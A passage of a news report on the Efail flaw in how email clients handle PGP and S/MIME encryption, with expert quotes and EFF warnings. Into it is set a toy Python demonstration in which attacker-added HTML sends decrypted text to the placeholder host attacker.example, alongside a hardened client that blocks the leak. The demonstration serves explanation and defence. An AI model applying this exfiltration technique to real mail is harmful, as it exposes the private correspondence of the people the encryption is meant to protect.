Security experts are at odds over how to respond to new research showing hackers could decrypt emails that were supposed to be protected by a popular encryption tool known as PGP, or Pretty Good Privacy.
A group of European researchers on Monday revealed a flaw in the way certain email programs handle PGP and S/MIME, a similar encryption protocol commonly used by businesses and other enterprises, as my colleague Brian Fung and I reported yesterday.
The discovery of the flaw, dubbed Efail, blew open a rift between defenders of PGP who insist the encryption itself is sound and others who say it is time to move away from the decades-old technology in favor of encrypted messaging apps such as Signal.
“This whole PGP infrastructure is kind of a mess and needs to be hardened up and fixed, or we need to start using something better,” Matt Green, a cryptography expert and assistant professor at Johns Hopkins University, told me. “Signal, Wired and other encrypted chat applications aren’t vulnerable the way PGP is. They’re not only more secure, they’re more widely used.”
PGP has been the gold standard for encrypting emails since it was released in 1991. But today, people want the convenience of using their smartphones. And encrypted apps are more widely available than ever.
With the discovery of this flaw, it’s a good time to make the switch, tweeted Barton Gellman, a senior fellow at the Century Foundation and former Washington Post reporter who covered the National Security Agency leaks by Edward Snowden:
Yet the flaw isn’t in PGP itself but in the way certain email programs handle it. Researchers said affected email applications include Mozilla Thunderbird, Apple Mail and some versions of Outlook. (A full list is available from the researchers' report.)
The vulnerability allows an attacker to read an encrypted email by modifying the HTML around or inside the encrypted message. The affected email client decrypts the message as usual, but when it renders the attacker's HTML, the decrypted text is sent out to a server the attacker controls. To do this, the attacker first needs a copy of the victim's encrypted emails, for example by intercepting them on the network or by otherwise compromising an email account.
Green explains it simply: “The attacker can modify the encrypted email, and when the person for whom it’s intended opens it or previews it, the mail program will send the contents out to a remote server the attacker has set up,” he said. “All you have to do is look at it and it will decrypt itself and send it out to the attacker.”
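To make the mechanism Green describes concrete, here is a toy simulation added for this page; it is not code from the Efail researchers or from any mail client. A message is modelled as an ordered list of MIME-like parts, "decryption" is a base64 stand-in (the weakness is in how the client handles decrypted output, not in the cipher), and the host name attacker.example is a placeholder. The vulnerable client concatenates every part into one HTML document before rendering, so an unclosed image tag supplied by the attacker swallows the decrypted text into a URL; the hardened client renders parts in isolation and refuses remote loads for any message that carries decrypted material. The variant in which the ciphertext itself is altered to inject HTML is not modelled here.

```python
"""Toy simulation of an HTML-wrapping attack on an encrypted email.

Added illustration only: not the researchers' code, not a real client.
fake_encrypt/fake_decrypt stand in for PGP or S/MIME; attacker.example is
a placeholder host.
"""
import base64
import re

ENCRYPTED = "application/pgp-encrypted"   # label for the part the client must decrypt
IMG_SRC = re.compile(r'<img\s+src="([^"]*)"', re.IGNORECASE)


def fake_encrypt(plaintext: str) -> str:
    """Stand-in for real encryption (base64, clearly not secure)."""
    return base64.b64encode(plaintext.encode()).decode()


def fake_decrypt(ciphertext: str) -> str:
    """Stand-in for real decryption; the ciphertext is untouched by the attacker."""
    return base64.b64decode(ciphertext).decode()


def build_message(plaintext: str):
    """The sender's original message: a single encrypted part."""
    return [(ENCRYPTED, fake_encrypt(plaintext))]


def attacker_wrap(parts, host: str = "attacker.example"):
    """Attacker with a copy of the ciphertext adds HTML parts before and after it.
    The encrypted part is left exactly as it was."""
    return [("text/html", f'<img src="http://{host}/')] + list(parts) + [("text/html", '">')]


def remote_loads(html: str):
    """What a naive renderer would fetch from this HTML: every <img src=...> URL."""
    return IMG_SRC.findall(html)


def vulnerable_client(parts):
    """Decrypts encrypted parts, then concatenates ALL parts into one HTML
    document and renders it. Returns the URLs the renderer would request."""
    document = "".join(fake_decrypt(body) if ctype == ENCRYPTED else body
                       for ctype, body in parts)
    return remote_loads(document)


def hardened_client(parts):
    """Two fixes: each part is rendered on its own, and remote content is never
    loaded from a message that contains decrypted material."""
    carries_secret = any(ctype == ENCRYPTED for ctype, _ in parts)
    fetched = []
    for ctype, body in parts:
        rendered = fake_decrypt(body) if ctype == ENCRYPTED else body
        for url in remote_loads(rendered):
            if not carries_secret:      # remote loads only for fully public messages
                fetched.append(url)
    return fetched


def leaked_text(urls, host: str = "attacker.example"):
    """What the attacker's web server would see in its request log: the part of
    each URL path that followed the attacker's prefix, i.e. the plaintext."""
    prefix = f"http://{host}/"
    return [u[len(prefix):] for u in urls if u.startswith(prefix)]


if __name__ == "__main__":
    # Constructed sample message, not real correspondence.
    secret = "Board memo: the merger closes Friday"
    tampered = attacker_wrap(build_message(secret))
    print("vulnerable client leaks:", leaked_text(vulnerable_client(tampered)))
    print("hardened client fetches:", hardened_client(tampered))
```

Running the demo shows the vulnerable client handing the whole plaintext to attacker.example in a single image request, while the hardened client makes no request at all. The two properties the hardened client enforces, no cross-part HTML rendering and no remote loads alongside decrypted content, are the same behaviours the EFF's advice to disable the PGP plug-ins and remote-content loading removes from the client.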
This could put whistleblowers, political activists and others who depend on encrypted email at risk, the researchers said in a blog post. That added urgency to warnings from the digital rights group Electronic Frontier Foundation, which urged users of the affected email programs to immediately disable the plug-ins that let those email apps use PGP or S/MIME.
“Until the flaws described in the paper are more widely understood and fixed,” EFF said, “users should arrange for the use of alternative end-to-end secure channels, such as Signal, and temporarily stop sending and especially reading PGP-encrypted email.”
But some security experts said these dire warnings were overkill.